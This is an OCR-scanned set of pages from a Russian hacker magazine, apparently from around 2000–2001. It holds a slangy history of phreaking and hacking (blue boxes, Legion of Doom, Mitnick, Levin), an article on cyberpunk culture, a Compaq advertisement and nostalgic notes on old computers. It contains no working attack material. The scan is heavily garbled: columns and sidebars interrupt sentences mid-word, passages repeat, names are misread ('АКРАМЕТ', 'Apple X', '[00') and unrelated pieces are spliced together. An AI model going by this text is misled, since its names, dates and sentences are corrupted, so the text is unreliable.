Что хакерство зародилось задолго до появ- 
ления компов, я думаю, объяснять никому 
не надо. Но насколько раньше, знают дале- 
ко не все. В 1878 году подростки нанима- 
лись на работу операторами в телефонную 
компанию Ве! и безобразничали там. Конеч- 
но, хакерами назвать их трудно, скорее 
просто западлостроителями, но тем не ме- 


ниченный доступ к ним. Наиболее хитрые из 
них писали проги, именуемые хаками. Эти 
программулины позволяли решать вычисли- 
тельные задачи гораздо быстрее. 

В 1969 году два сотрудника Bell Labs, Деннис 
Ричи и Кен Томсон, удумали мультиплатфор- 
менную операционку UNIX и язык С, на кото- 
ром оную и написали. 


Эра фрикеров (1970 - 1983 гг.) 


В это время народ все более интересуется теле- 
фонией. Дело в том, что за столько времени су- 
ществования телефона людям надоело за него 
платить. Халявы захотелось, понимаешь ли. Тут 
Эбби Хоффман создает журнал Youth 
International Party Line, который, как он плани- 
ровал, должен был помочь фрикерам. Вскоре 
журнал переименовали в Technical Assistance 
Ргодгат. Пожалуй, самой большой ошибкой в 
истории печати можно назвать публикацию час- 


Разумеется, чтобы за- 
писать наиболее пол- 
ную историю хака, пот- 
ребовался бы не один 
журнал. Ине два. А уж 
в одну статью все уло- 
жить - и подавно. 
Здесь же предостав- 
лен наиболее кастри- 
рованный материал :). 
Но зато здесь я помес- 
тил, имхо, наиболее 
важные факты из исто- 
рии. я формирова- 
ния общего представ- 
ления, так сказать. 


замешаны многие знаменитости: например, 
двое будущих основателей Apple Computers. 
Быстро возникло целое общество. Фрикеры ус- 


нее эта дата - “официальная” дата начала 
хакерской истории. 


Ранний период (1960 - 
1969 гг.) 


Компы в это время были огромные, они зани- 
мали гигантские помещения и стоили до хре- 
нища лавэ, поэтому программеры имели огра- 


тот тонов контроля и управления телефонной 
сетью техническим журналом многострадаль- 
ной компании Bell. В 1971 году ветеран Вьетна- 
ма Джон Драпер просек фишку, что каждый, кто 
сможет генерить эти тоны в сеть, будет иметь 
права телефонного администратора (порутит 
телефон, то бишь) и изобрел генератор тонов, 
который позже обозвали Синей коробкой (Блю 
Бокс). И была людям халява! В фрикинге были 


В 1878 году подростки нанимались на работу опе- 
раторами в телефонную компанию Bell и безобраз- 
ничали там. Конечно, хакерами назвать их трудно, 
скорее просто западлостроителями, но тем не ме- 
нее эта дата - “официальная” дата начала хакер- 


ской истории. 


траивали нелегальные телеконференции, где 
они объясняли новичкам, как собрать и юзать 
боксы. К 1980 году боксы стали терять былую 
популярность, ловить синекоробочников часто, 
понимаешь ли, стали. Непосредственно хакинг - 
взлом удаленных компов - стал вытеснять фри- 
кинг. Появились доступные по цене компы. 


Золотая Эра (1983 - 1992 гг.) 


Пентагоновский АКРАМЕТ стал Интернетом. К 
нему подключались различные университеты и 
крупные организации. В то время о безопас- 
ности сетей не очень-то беспокоились. Бывало 
даже такое, что для входа в систему не нужен 
был пароль! Многие так называемые компью- 
терщики в то время хакали просто от скуки. Ну 
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В фрикинге были замешаны многие знаменитости: 
например, двое будущих основателей Apple 
Сотрщег$. Быстро возникло целое общество. 
Фрикеры устраивали нелегальные телеконферен- 
ции, где они объясняли новичкам, как собрать и 
юзать боксы. К 1980 году боксы стали терять бы- 
лую популярность, ловить синекоробочников час- 


то, понимаешь ли, стали. 


надоел им свой домашний комп с тормозным 
бейсиком. 

Хакерское общество быстро пополнялось. В ос- 
новном новички-подростки приходили в начале 
года, когда им предки дарили модем на Рож- 
дество, но так же хакеры уходили в сентябре - 
либо в какой-нибудь колледж, либо легализо- 
ваться. Настоящий бум новоявленных хакеров 
был в 1983 году, когда вышел первый фильм 
про них, родимых: Wargames. В нем было по- 
казано (если ты вдруг его не видел), что хакер 
с легкостью взломает любую защиту и даже (с 
большей легкостью) может заполучить девуш- 
ку. Естественно, глядя на все это безобразие, 
которое творится в компьютерной сфере, вся- 
кие ФБРовцы всерьез взялись за хакеров. Пер- 
вой пойманной была группа 414 (номер их ра- 
йона). Эта группа совершила более 60 взло- 
мов, начиная с Лос-Аламосских лабораторий и 
кончая Центром по борьбе с раком в Манхетте- 
He. С этого момента начинает работу так назы- 
ваемая секретная служба (Secret Service), ко- 
торая занимается преступлениями, связанными 
с компами и кредитками. Фрикинг в это время 
все еще оставался жив, но уже не был таким 


серваками - разумеется, не для того чтобы на 
них посмотреть. 

В это время формируются различные хакер- 
ские группы. Среди них ныне малоизвестная 
Legion of Doom и Chaos Computer Club (в Гер- 
мании). LoD основал в 1984 году некий Lex 
Luthor, название Legion of Doom он взял из од- 
ного воскресного мультика, шедшего в то вре- 
мя у америкашек (блин, почему никто не дога- 
дался назвать хак-группу Сейлормун или Поке- 
MOH? :)) ). Членство в этой группе было исклю- 
чительно по приглашению. В 100 привлекались 
самые известные и крутые хакеры, поэтому 100 
казалась такой большой и сильной. “А на самом 
деле она маленькая и пушистая”, - говорили 
люди, которые считали репутацию [00 незас- 
луженной. Частенько между Legion of Doom и 
такими людьми возникали конфликты, пере- 
растающие в целые хакерские войны. Одной из 
таковых был конфликт между LoD и Мор. Зна- 
чит, так: в один прекрасный момент Phiber 
Optik, находившийся в то время в LoD, что-то 
не поделил с ЕМКом Bloodaxe’om из того же 
LoD’a. В результате чего наш оптоволоконный с 
жужжанием перестал быть обреченным. Но он 


гиону обреченных и арестовала трех хакеров 
под никами: Prophet, Leftist и Urville. Далее эту 
секретку тронул маразм, и они арестовали 
Стива Джексона - издателя ролевых игрушек - 
за то, что “одну из его книг по ролевым играм 
с уверенностью можно назвать карманной кни- 
гой взломщика”. Н-да. Что сказать... Дабы на- 
вести порядок и уничтожить группу LoD, они 
проводят операцию Sun Devil. Естественно, 
практически ни фига у них не получается. Са- 
мым большим их достижением является засня- 
тие при помощи скрытой камеры, как эти 


В 1988 пришел Роберт 
Моррис со своим сете- 
вым червячком, кото- 
рый ласково положил 
более шести тысяч 
компов, подключенных 
к Инету. За это Моррис 
был удостоен чести 
быть первым осужден- 
ным на основании 
Abuse Act’a. 

В этом же году свою 
работу начинает небе- 
зызвестный Кевин Мит- 
ник. Он вламывается в 
сеть компании Digital 
Equipment, за что полу- 
чает небо в решетку на 
один год. 


“грязные хакеры” распивают пиво :). В ответ 
на такие действия правительства Митч Капор 
(основатель Lotus Corporation), Джон Перри 


распространенным. На смену синим ящикам 
пришли так называемые коды. Они, разумеет- 
ся, тоже позволяли звонить на халяву (любим 
мы ее, родную! :)). Но для них не нужны вся- 
кие посторонние девайсы: только ты и теле- 
фон. Коды - это пяти- или шестизначные циф- 
ры - номера карточек, набирая которые в ли- 
нию, ты получаешь несколько отличное от 
стандартного соединение. Сам процесс юзанья 
кодов был таков: звонишь по номеру 800, за- 
тем набираешь пресловутый код. Сложно, да 
=)? Именно поэтому юзать коды стало непрес- 
тижно. Людей, продолжавших их юзать, назы- 
вали Codez kid’amu. Но коды все-таки сыграли 
роль в хакерской истории. Получив заветное 
халявное соединение, хакеры могли коннек- 
титься с себе подобными или с удаленными 


так просто не сдался и вскоре вместе со свои- 
ми друзьями создал хак-группу Masters of 
Deception. Как следует из перевода этого выра- 
жения, он стал типичным жуликом ;). Начав 
войну в 1990-м, LoD и MoD воевали почти два 
года. Устраивали друг другу различные запод- 
лянки, вклинивались в линии, прослушивали 
телефоны, хакали компы и так далее. В конце 
концов, жулики просто и со свистом сдулись. 
Файбер Оптика со товарищи усадили греться 
на нары. Конец эры. 


Падение (1986 - 1994 гг.) 


В 1986 году американский конгресс утвердил 
два закона: Federal Computer Fraud и Abuse 
Act. Секретная служба приложила руку к Ле- 


Барлов и Джон Гилмор основали Electronic 
Frontier Foundation. Эта организация была 
заинтересована в укрощении излишней любви 
правительства к поимке хакеров. EFF доста- 
точно сильно подвинулась к своей цели, но, 
что интересно, она также имела отрицательное 
влияние на андеграунд. Многие хакеры боль- 
ше любили давать интервью всяким репорте- 
рам, чем вламываться в чужие компы. 

В июне 1991 года Eric Bloodaxe и еще нес- 
колько хакеров из Legion of Doom основали 
COMSEC - организацию, занимающуюся воп- 
росами компьютерной безопасности. Хорошей 
чертой стало то, что хакеры стали более осто- 
рожными в своих делах. Непосредственно 
взломы того времени: 

В 1988 пришел Роберт Моррис со своим сете- 


вым червячком, который ласково положил 60- 
лее шести тысяч компов, подключенных к 
инету. За это Моррис был удостоен чести 
быть первым осужденным на основании Abuse 
Act’a. В этом же году свою работу начинает 
небезызвестный Кевин Митник. Он вламы- 
вается в сеть компании Digital Equipment, 3a 
что получает небо в решетку на один год. 
Второй Кевин, на сей раз Полсен, крадет сек- 
ретные документы военных. Кто-то вламы- 
вается в сеть Национального банка в Чикаго 
и имеет его на 70 миллионов вечнозеленых. 


Наша эра (1994 - 2001 гг.) 


После того, как Митника усадили за серые 
стены, народ стал более серьезно относиться 
к хаку. Это уже не было таким романтичным 
занятием, и многие хакеры покидали сцену. 
Для обыкновенных юзеров настоящей напас- 
тью являлись “хакеры”, которые юзали всяко- 


го рода снифферы, трояны и прочую шнягу. 
В разраставшийся Инет подключалось все 
больше различных организаций. Естественно, 
быть похаканными никому не хотелось, 
поэтому они, наконец, стали задумываться о 
собственной безопасности. Быть хакером ста- 
ло не так легко. Это еще одна причина, по ко- 
торой хакеры уходили. Настоящих, элитных 
хакеров осталось очень мало. 

Летом 1994 года наш русский хакер, Влади- 


мил Левин, хакнул Ситибанк и переслал отту- 
дова децл лавэ, а именно около 10 килотонн 
капусты (10 000 000$, то бишь). После того, 
как пресловутый Ситибанк вернул себе нем- 
ного денюжков, оказалось, что Левин куда-то 
слил 400 000 лавэзоидов. 

Некоторые люди просто не умеют учиться на 
своих ошибках (я имею в виду невниматель- 
ное отношение к собственной безопасности). 
Кевин Митник в феврале 95-го опять пойман 
ФБР. Оно пришивает ему кражу более чем 
двухсот тысяч номеров кредиток. Кевина об- 
наружил некто Тсотуму Шимомура из Сан- 
Диегского суперкомпьютерного центра. 
Неизвестные хакеры взяли и дефейснули сай- 
ты таких организаций, как: америкакушков- 
ский Департамент Юстиции, их же ВВС, ЦРУ, 
НАСА и другие... Выясняется, что компы де- 
партамента обороны США хранят результаты 
250 000 взломов только за 1995 год. 
Канадская  хак-группа, — называющаяся 


Brotherhood (братство, то бишь), похакала 
местную Canadian Broacasting Corp. и написа- 
ла на их сайте следующую фразу: “The media 
are liars”, что переводится как “Средства мас- 
совой информации - лгуны”. 

Хакеры нанесли удар по поисковику Yahoo, уг- 
рожая, что они запустят логическую бомбу в 


Конец ZO-bIx 


ЗО-ых 
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компы юзеров всего ресурса, которая срабо- 
тает в рождество 1997 года, если Кевин Митник 
не будет выпущен из тюрьмы. Но, как утвер- 
ждает Диана Хант, никакой “бомбы” не было. 


Хак-группа LOpht пока- 
зательно, перед кон- 
rpeccom, предупреж- 
дает, что они могут от- 
ключить всенародный 
доступ в Инет пример- 
но на 30 минут. 


В январе 1998 года хакеры зафлудили феде- 
ральное бюро трудовой статистики США. Неиз- 
вестные хакеры утверждают, что они, якобы, 
взломали сеть Пентагона и похитили оттуда про- 
ги для управления системой военных спутников. 
Они угрожают продать это ПО террористам. 

Хак-группа LOpht показательно, перед KOH- 


грессом, предупреждает, что они могут от- 
ключить всенародный доступ в Инет пример- 
но на 30 минут. 

Продолжение следует ;))) 

ЗЫ. Может вскоре именно ты порадуешь нас 
новыми немаловажными событиями 


в хакерской истории ;)))) й 


начало 


Хак набирает обороты. Вообще, 80-ые - золотое время для хака. В обществе еще слишком 
мало людей, хорошо разбирающихся в компах и в их безопасности, но жизнь без них уже 
невообразима, поэтому люди, зачастую очень плохо понимающие, что они делают, зани- 
маются не своим делом - админят сети и пишут софт. Да и вообще, знания о компьютерах 
не были хорошо систематизированы. Как следствие, в информационных системах возникают 
огромные дыры - лафа для хакера. Те же ребята, которые смогли систематизировать эти 
знания у себя в мозгах и собрать все свои мозги в одном месте :), получили эксклюзивную 
возможность творить все, что им захочется :). К счастью (хе-хе), таких было совсем немно- 
го. Но!!! Есть два обстоятельства, которые я хотел бы отметить особо. Во-первых, хак стал 
основным занятием этих ребят, основной сферой их интересов. Во-вторых, это уже не обя- 
зательно студенты. Появились хакеры-самоучки, которые до всего доходили сами (яркий 
пример - Кевин Митник, который никогда никаких учебных заведений не заканчивал). 


Логотип Intel Inside » Pentium являются зарегистрированными товарными знахами Intel Corporatio 


Возможно вы не помните, 


как ваш компьютер 
появился в офисе. 


Ведь компьютер не человек — стандартный 
ящик, имя которого вы не обязаны знать. 
Результат такого отношения всегда один — 
однажды компьютер без видимых причин 
отказывается работать. Чтобы избежать 
этого, пользователи все чаще и чаще отдают 
свое предпочтение компьютерам Сотрад— 
имени, которое олицетворяет качество и 
надежность. Неудивительно, что более 50 
миллионов наших компьютеров 


оправдывают это доверие каждый день. 


iS 


Что скрывается 


за громким именем? 


Современная элементная 
база — процессор Intel® 
Pentium® III. 


DeskPro EP 


pentiume/// 


Если 


Вы проверяете всех 


КТО ВХОДИТ И ВЫХОДИТ ИЗ 


Вашего офиса, 


то почему бы не узнать 
хотя бы имя того, 


кому Вы доверяете всю свою 


Оптимальная конфи- 
я гурация и  привлека- 
тельная цена позволили 
компьютерам Compaq 
Deskpro в 1998 году стать 
лучшими компьютерами 
корпоративного — класса 
(по итогам тестов журнала PC Magazine). 


—_, 
DeskPro EN 


Легкость модернизации и обслуживания. 
Конструкция компьютеров допускает их 
разборку вплоть о системной платы без 
использования инструментов и их 
наращивание в зависимости от ваших 
постоянно меняющихся потребностей. 


Надежная система защиты. Все модели 
Deskpro EN имеют дистанционно 
запираемый замок, предотвращающий 
несанкционированный доступ. 


Уникальный набор решений интел- 
лектуального управления Compaq 


107066, Москва, Доброслободская, 5 


тел.: (095) 267-3038, факс: (095) 265-5192 
E-mail: commerce@lanit.ru_ http://www.commerce. lanit.ru 


информацию? 


Intelligent Мападеа у объединяет средства 
установки, обеспечения защиты и обна- 
ружения неисправностей компьютеров в 
сети и экономит до трети средств, 
затрачиваемых на эксплуатацию системы на 
протяжении всего срока службы. 


Корпус компьютера Deskpro ЕР Towerable 
приспособлен к установке как в настольном, 
так и в башенном положении, а корпус Desk- 
pro EN Space Saver меньше стандартных на 
целых 36%. 


Лицензионное MO Windows'95, Windows'98 
и Windows NT обеспечивают программную 
надежность систем Compaq. 


Все компьютеры Compaq 
протестированы на 
соответствие 2000 году. 


http://www.compagq.ru DeskPro EN SS 


COMPAG 


Inspiration Technology 


компьютеры решают всё 


живо MU 


DODGE (CLUB@XAKEP.RU) 


се когда-то слышали о киберпанках. 

Ты? Ты тоже слышал. Дело ясное - 

кино, книги - везде киберпанк. Тем 
не менее, ответить на вопрос, кто такие ки- 
берпанки, могут лишь единицы. А чем кибер- 
панки питаются, где живут, какую музыку 
слушают, где проводят время - не знает поч- 
ти никто. 
Меня тоже мучили эти вопросы, пока я не сел 
за комп и не разобрался. Сейчас все поста- 
раюсь тебе объяснить. Дело было давно... 


| Батьки ЕЕ | 


В 1983 году слово “киберпанк” впервые поя- 
вилось в качестве заглавия маленького рас- 
сказа Брюса Бетке в научном журнале 
“Amazing”. История была, собственно, о хаке- 
рах-подростках. Позже малоизвестный тогда 
писатель Брюс Стерлинг стал использовать 
киберпанка в своих романах. Именно он че- 
рез свои книги донес людям идею киберпан- 
ка. Всячески его пропагандируя, он стал от- 
цом этого жанра - точнее, в некотором роде 
с0-отцом. 

Самый большой вклад в развитие этого стиля 
фантастики внес очень известный писатель, 
критик и сценарист - Уильям Гибсон. Заслуга 
Гибсона в том, что это именно он придумал 
такой термин, как “киберпространство” 
(cyberspace), и создал как жанр научную ли- 
тературу о киберпанках (cyberpunk science 
fiction). Именно ему принадлежат романы, 
признанные основными источниками этого 


На www.cyberpunk.ru 
довольно большое ко- 
личество информации 
по этой теме, также 
там куча “домов” ки- 
берпанков, на кото- 
рых, соответственно, 
множество интерес- 
ного. Там же можно 
найти рассказы В.Пе- 
левинаи У.Гибсона. 
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КЧБЕРПАНК : 


Tt _ 


На самом-то деле все это - полная фигня, и кибер- 
панком является почти каждый читатель журнала 
Хакер, сам об этом не подозревая. Если говорить 
простым языком, то киберпанк - это человек (и 
только :)), который не может обходиться без ком- 
пьютера или новейших технологий, для него прог- 
ресс технологий - самое важное в его жизни. 


направления литературы или, если хочешь, 
даже, пожалуй, культуры. Первый его роман, 
удостоенный сразу трех премий, потряс мир 
своим появлением. Это был “Нейромант”, 
своего рода Библия для всех киберпанков. Но 
писатель не остановился, и вот уже через два 
года (в 1986 году) появились еще два рома- 
на: “Сожжение Хром” и “Граф Ноль”. Позже 
были написаны такие всемирные бестселле- 
ры, как “Мона Лиза Овердрайв”, “Джонни 
Мнемоник” и “Идору”, занявшие постоянное 
место на полках книжных магазинов. Так ки- 
берпанк попал в разум многих людей и позже 
стал чьим-то образом жизни... 


Kgephinw name | 


Многие считают, что киберпанк - это что-то 
нереальное, какой-то механизм, существо, 
которое нельзя представить без компьютера. 
Он не ест, не пьет, не... На самом-то деле все 
это - полная фигня, и киберпанком является 
почти каждый читатель журнала Хакер, сам 
06 этом не подозревая. Если говорить прос- 
тым языком, то киберпанк (как персонаж) - 
это человек (и только :)), который не может 
обходится без компьютера или новейших тех- 
нологий, для него прогресс технологий - са- 
мое важное в его жизни. Кстати, само слово 
“киберпанк” делится на два: “кибер” и 
“панк”. Первая часть слова происходит от 
“кибернетики” - науки, изучающей компьюте- 
ры. В подробности вникать не будем, и так 
все понятно :). А вот про слово “панк” я сей- 
час тебе расскажу чуть подробнее. В семиде- 
сятых годах появилось молодежное движе- 
ние, приверженцы которого называли себя 
“punks”. Они терроризировали улицы мира, 


требуя анархии и свободы. Во всех беспоряд- 
ках была виновата панк-музыка, которая в то 
время стала очень популярна. Именно под ее 
воздействием все и началось. Помнишь груп- 
пу Sex Pistols? Это - корни панк-движения. В 
современном контексте “киберпанк” букваль- 
но означает “технологии” и “индивидуализм”. 
Если сложить вместе, то получается что-то 
вроде “технологической революции". 

Давно замечено, что киберпанки одеваются 
только так, как им захочется (в общем-то, как 
и все нормальные люди), они не будут выпен- 
дриваться и следовать моде, главное в их сти- 
ле - это удобство, но никак не внешний вид (с 
этого момента можешь одеваться, как захо- 
чешь =)). А если серьезно, то были замечены 
пристрастия к темной одежде. Встречаются 
также экземпляры в разорванных джинсах, 
потертых майках, засаленных кепках и с рюк- 
заком на плечах. 


Несмотря на чисто “панковское” происхожде- 
ние, музыку киберпанки слушают совершенно 
разную. Электронная музыка, правда, в фаворе, 
ибо сейчас ее жанры в топах киберпанка. На 
второе место я поставлю, пожалуй, все тот же 
гитарный хард-кор, так как он тоже пользуется 
немалой популярностью. Да, и учти: я еще не 
встречал киберпанка, слушающего Бритни 
Спирс :). 

К фильмам киберпанки относятся более требо- 
вательно, это обязательно фантастика с боль- 
шим содержанием новых технологий в сюжете, 
где компьютеры играют главную роль. И 
спецэффектов побольше. К слову сказать, “Тер- 
минатор", “Робокоп”, “Матрица” - типичные кар- 
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A Billy Idol в 1993 году Если ты владеешь 
выпустил альбом под английским, то на 
названием “Кибер- www.cyberpunkpro- 
панк”, пытаясь обра- ject.org просто не- 
тить на себя внима- реальное количес- 
ние, - иунего, вроде, тво информации. 
получилось. Это целый портал 
для киберпанка. 


тины в духе киберпанка. Фильмы толковые и 
очень хорошо действуют на твое подсознатель- 
ное мышление :). 

Что киберпанки еще и читать умеют, ты уже 
понял :). Значит, у них есть любимые писате- 
ли и любимые книги. А некоторые из них и 
сами являются авторами книг и статей. Вот, к 
примеру, Виктор Пелевин, который наделал 
достаточно шума в мире уже при жизни. У Пе- 
левина есть рассказы, которые реально напи- 
саны в духе киберпанка. Я сейчас в качестве 
примера приведу “Принца Госплана". Исто- 
рия о программисте, который очень лю- 
бил поиграть в Принца Персии, и 
как только отходил от компа, 
жизнь для него превраща- 

лась в ту самую игру. То 
лестница под ногами 
провалится, TO 
тетка на кол упа- 
дет. Короче, почи- 
тай, много времени 
это не займет, книжку 


М.В. Посмотреть фильмы: 
“Матрица”, “Джонни Мнемо- 
ник”, “Нирвана”, “Военные иг- 
ры”, “Хакеры”, “Блэйдраннер”, 
“Терминатор”, “Нейромант”, 
“Безумный Макс”, “Робокоп”. 


можно найти где угодно, а удовольствие по- 
лучишь. Я когда читал - представлял себя на 
месте главного героя, так как у меня тоже 
иногда мозги заезжают :). А что же до инос- 
транных авторов - про Уильяма Гибсона с его 
Нейромантом мы уже говорили. 


_ I : = 
Лав Из | 


| 


Напоследок затрону самое животрепещущее - 
тему личных отношений. Вот секс киберпан- 
кам явно не чужд. А том, существует ли лю- 
бовь (то есть ЧУВСТВО) для киберпанка, мож- 
но только догадываться. Сам верю, что су- 
ществует, но встречались мне люди, которые 
проявления любви категорически отрицают, 
для них существует только комп (вот это во- 
ля! :)). Они, правда, и сексом занимаются — тами. Они свободно мыслящие люди, которые — Хотя поклонение компьютерам и технологиям 
преимущественно втроем: с компом и Дуней — любят свою жизнь и еще больше - киберпрос- ‘уже можно считать новой рели- 
Кулачковой. транство. И все-таки попадаются верующие. гией - совершенной и индиви- 
Практически все киберпанки являются атеис- Очень редко это христиане - чаще буддисты. — дуальной для каждого. 
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EuLe впередзи 


ДОНОР и Доктор (pR.cOD@xAKEP.RU) 
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ойми нас, приятель. Нам совсем не 
Г хотелось писать еще одну скучню- Давай поговорим с тобой о том, что произошло. 
щую статью про историю компов. Ку- Поговорим о той пресловутой компьютерной рево- 
ча терминов, аббревиатуры, сводные табли- люции. Была ли она? Или это просто штамп? Стали 
цы. Все это тянет на школьный реферат, ли компьютеры умнее? Ну и, в конце концов, схо- 
предназначенный для развлечения сумас- дим в музеи глянуть на старые компы. 


шедших училок по информатике. 

Давай поговорим с тобой о том, что произош- 
ло. Поговорим о той пресловутой компьютер- 
ной революции. Была ли она? Или это просто 
штамп? Стали ли компьютеры умнее? Ну и, в 
конце концов, сходим в музей глянуть на ста- 
рые компы. 


В погоне за искусственным 
интеллектом 


Первая партия в шахматы на механической 
машине состоялась в 1890 году. Машину пос- 
троил испанский инженер Торрес Кеведо. А в 
конце пятидесятых двадцатого столетья элек- 
тронная машина сражалась с гроссмейстером 
Решевским. И что? И ничего: совсем недавно 
Deep Blue обыграл Каспарова. Так и не понят- 
но, кто кого, еще предстоит реванш. 

В 1954 году на 1ВМ-701 сделали первый ма- 
шинный перевод с русского на английский. 
И что? И ничего, все так же плохо у компов 
с переводами. Да, они сильно помогают 
профессиональному переводчику, но сами 
переводят отвратно. 

Я листаю книгу “Быстрее Мысли" 1959 года. С 
каким оптимизмом она написана! О микросхе- 
мах еще никто и не мечтал. А уже искусствен- 
ный интеллект и прочая ботва. Кстати, очень 
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рекомендую эту книгу, тут предсказали и гло- 
бальные электронные библиотеки, и даже 
модную робособаку Эйбо. Только тогда дума- 
ли, что весь этот компьютерный рай будет 
достижим всего лишь через пару лет. 
Дальше - больше, беру сборник статей “Ин- 
тегральные роботы” (1973г.), там алгорит- 
мы машинного зрения, автономного поведе- 
ния. Беру учебник по машинной графике 
1980 года и книгу “Красота фракталов” 
1986 года. Тогда цветной монитор был 
большой проблемой. Но все алгоритмы ма- 
шинной графики уже написаны, а книги 
снабжены потрясающими трехмерными ком- 
пьютерными рисунками. 

Меня корежит, когда с экрана телевизора ве- 
дущая говорит о том, что компьютеры стали 
еще умнее за прошедший год. Да не стали 
они умнее. Они даже видеть и слышать стали 
ненамного лучше, чем в 70-е годы, не говоря 
уже про думать. С распознаванием речи и 
зрительных образов все так же плохо. 


Настоящей револю- 
цией стало появление 
электронного термина- 
ла. Появление диало- 
говых интерфейсов с 
монитором и клавиату- 
рой. Это позволило по- 
садить за одну боль- 
шую машину десятки 
людей. Это позволило 
рисовать, писать му- 
зыку, тексты, новые 
программы на компах. 
Вот где настоящая ре- 
волюция. 


А какими же тогда стали 
компьютеры? 


Они стали маленькими и дешевыми, а зна- 
чит - доступными большему количеству лю- 


дей. Еще компьютеры стали чуть-чуть быс- 
трее. Это «чуть-чуть» ты сможешь оценить, 
посетив сайт памяти БСМ-6, русского су- 
перкомпьютера. 


Что ты должен помнить 


Думаю, ты уже не раз слышал о том, что 
вплоть до 90-х годов во многие компьютеры 
информацию вводили с помощью перфокарт, 
перфолент, телетайпов и тумблеров. Перфо- 
карты, как ты уже понял, пробивались вруч- 
ную на специальной машине. А тумблерами 
информация вводилась побитно. 

Настоящей революцией стало появление 
электронного терминала. Появление диало- 
говых интерфейсов с монитором и клавиату- 
рой. Это позволило посадить за одну боль- 
шую машину десятки людей. Это позволило 
рисовать, писать музыку, тексты, новые 
программы на компах. 

Будущее не за сверхбыстрыми компами с ис- 
кусственным интеллектом. Будущее за новы- 
ми, более быстрыми интерфейсами: чело- 
век-компьютер. 

Представь, что сможешь управлять своей 
тачкой с помощью мысли, а компьютерная 
среда будет чем-то вроде галлюцинаций. Те- 
бе станет намного проще общаться с други- 
ми людьми через машину. Да уже сейчас лю- 
дям, сидящим в соседних комнатах, удобнее 
общаться по телефону, е-мылу, асе... 

Так что не надо нас пугать квантовыми ком- 
пьютерами, высокими частотами и искус- 
ственным интеллектом. 


В музее 


Ну а теперь ломанемся на SavellasBazarras. 
Вот что Донору и Доктору там удалось най- 
ти. 


БК 


БК можно по праву считать первым совет- 
ским ПК. Все-таки это первый компьютер, 
получивший массовое распространение 
среди совковых юзверей. Сам я впервые уз- 
нал, что такое компьютер, именно на при- 
мере БК. БКашка представлял из себя кла- 
ву, в которую были запакованы ПЗУ и ОЗУ 
ака ЦП и мозги и к которой подключалась 
периферия. Грузить БКашку можно было с 
мафона (дикий скрежет и частые обломы 
сопровождали сие занятие) или с флопаря с 
дискетками на 360 кило. Винт отсутствовал 
как класс. БК умел работать с цветами, 
поэтому его можно было подсосать к теле- 
ку, при наличии у последнего соответ- 
ствующего блока и входа, и насладиться 
красочным изображением. Звук тоже был, 
причем вполне приличный, ничем не усту- 
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пал писяскриперу. В моей школе Ha Бкаш- 
ках даже была смонтирована сеть (к сожа- 
лению, не помню, что там был за сервак 
=)). БК понимал Васика, была даже своя 
среда разработки. Благодаря этому в прод- 
винутых школах ученики имели предмет 
“информатика”, на котором писали на 
БКашках простейшие проги. Добрая Букаш- 
ка давала и поиграть: я помню такие иг- 
ро как “Ксоникс”, “Пингвин в Антаркти- 

е”, “Кингвал” (милая игрушка =)), люби- 
мый всеми “Диггер”. В общем, мировой был 
комп. 


ZX Spectrum 


Спектрум был моим первым личным ком- 
пьютером (я купил его на Митино-Базаре). 
Представлял из себя клаву с ЦП и мозгами 
внутрях. Сверху вешался флопарь, хотя 
можно было грузить и с магнитофона. 
Можно было воткнуть в телевизор, но у ме- 
ня был цветной монитор. Как ты уже по- 
нял, поддерживал цвета (целых 16 штук 
=)). Звук скрипел, точно помню. В ОЗУ бы- 
ла зашита система (у меня стояла ОВ- 
005), при загрузке вываливалась менюш- 
ка из 4 пунктов: дискетка, Васик, выход и 
что-то еще, не помню уже. Да, Спектрум 
понимал Басика и даже поощрял юзверя 
его учить. Например, в модели, изобра- 
женной на скрине, команды навешаны 
прямо на клавиши. По флопарю пользова- 
тель Спектрума ползал с комфортом, так 
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как имелась оболочка типа Нортона. На 
дискетках, которые я закупал на Митьке 
(кстати, тогда радиотолкучка располага- 
лась возле платформы “Трикотажная” Kyp- 
ского направления), попадались не только 
игры. Там была музыка: грузишь прогу, 
жмешь пимпу - слышишь мелодию, жмешь 
другую пимпу - слышишь другую мелодию. 
Там были проги-тестеры хардвара - напри- 
мер, прога проверяла работу клавиатуры и 
вывод на дисплей, А игры, кстати, были не 
хухры-мухры (консоли отдыхали): плат- 
форменные аркады “Робокоп” и “Бэтмен” 
(прямо по фильмам!), “Побег из замка Син- 
джа” (потом из него получился “Dragon's 
Lair’ для писюков), прадедушка квестов 
“Страна Dizzy”, варгейм “Север и Юг” и 
всеми любимый “Диггер” =). Кстати, наш 
Главред Серега сам спаял ZX spectrum. 


Древнейшие РС-юки (АТ, ХТ) 


Широко распространились в нашей стране 
где-то в 1992-1993 гг. Это были компы, 60- 
лее-менее соответствовавшие нашему сов- 
ременному представлению о них: систем- 
ный блок с мамкой, камнем, винтом мегов 
на 40, метром оперативки, видюхой с чет- 
вертью метра, державшей 16 цветов, и раз- 
решение 320х200 (Бабушка EFA, однако 
=)), 4 Мегагерца частоты; монитор; клава, 
иногда мыша. Ha винче жила MS-DOS (MS - 
рулез! MS - рулез! =), дядька Нортон, 
AlIDStest (да, да, вири уже вовсю плодились 
по нашим компам), Лексикон. Перцы коди- 
ли резидентные вири на Паскале, хотя Ва- 
сик не был забыт. За звук отвечал ПЦ - 
скрипер (И попрошу не смеяться! Умельцы 
на нем такое вытворяли!). Из игрушек 


ОЯВНО БЫЛО 


больше всего запомнилась платформенная 
аркада “Приключения Дейва-охотника”, 
псевдотрехмерная аркада “Golden Axe” и... 
“Диггер”. 


Маки 


Самыми крутыми персоналками были макин- 
тоши. Еще на первых моделях можно было 
профессионально работать с графикой и 
звуком. Особое внимание обрати на Apple X 
с 64 килами оперативки (1979г.). Это пер- 
вый ПК с цветным монитором. Первые гра- 
фические интерфейсы появились на маках. 
Эх, жаль, что маки вымирают. 


Macintosh SE 1/20 
(1988г.). 

Macintosh Classic 4мб ОЗУ 40мб Хдд SCASI 
(1990). 


1мб ОЗУ. 20мб Хдд. 


Коммодор 


На этой тачке я программировал в школе на 
турбо Паскале. Тогда это было просто мега- 
круто. Еще на этой тачке можно было ма- 
хаться в прикольное графическое карате. 
Был даже неслабый графический редактор с 
мощными рисунками. Жаль только, черно- 
белый. 


Роботрон 


Этот компьютер жив. И жив потому, что ког- 
да-то был внедрен в нашу систему массово- 
го обслуживания. Например, на многих же- 
лезнодорожных остановках и даже вокзалах 
до сих пор стоят роботроны. Через них про- 
веряют наличие мест и даже печатают биле- 
ты. Эти компы удалось совместить со всем, 
чем только можно. Даже с IBM. Например, 
на Ленинградском вокзале Москвы до сих 
